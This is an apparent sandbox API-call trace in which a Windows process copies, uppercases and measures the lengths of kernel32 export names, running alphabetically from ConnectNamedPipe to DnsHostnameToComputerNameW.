[0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.529] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.529] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.529] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.529] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.529] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.529] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.530] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.530] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.530] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.530] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.530] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.530] lstrlenA (lpString="COPYFILEA") returned 9 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.530] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.530] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.530] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.530] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.530] lstrlenA (lpString="COPYFILEW") returned 9 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.530] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.530] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.530] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.530] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.530] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.530] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.530] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.531] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.531] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.531] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.531] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.531] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.531] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.531] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.531] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.531] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.531] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.531] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.531] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.531] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.531] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.531] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.531] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.531] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.531] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.532] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.532] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.532] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.532] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.532] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.532] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.532] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.532] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.532] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.532] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.532] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.532] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.532] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.532] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.532] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.532] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.532] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.532] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.532] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.533] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.533] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.533] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.533] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.533] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.533] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.533] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.533] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.533] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.533] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.533] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.533] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.533] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.533] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.533] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.533] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.533] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.533] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.533] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.534] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.534] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.534] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.534] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.534] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.534] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.534] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.534] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.534] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.534] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.534] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.534] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.534] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.534] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.534] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.534] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.534] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.534] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.535] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.535] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.535] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.535] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.535] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.535] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.535] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.535] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.535] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.535] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.535] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.535] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.535] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.535] lstrlenA (lpString="DELETEATOM") returned 10 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.535] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.535] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.535] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.535] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.535] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.536] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.536] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.536] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.536] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.536] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.536] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.536] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.536] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.536] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.536] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.536] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.536] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.536] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.536] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.536] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.536] 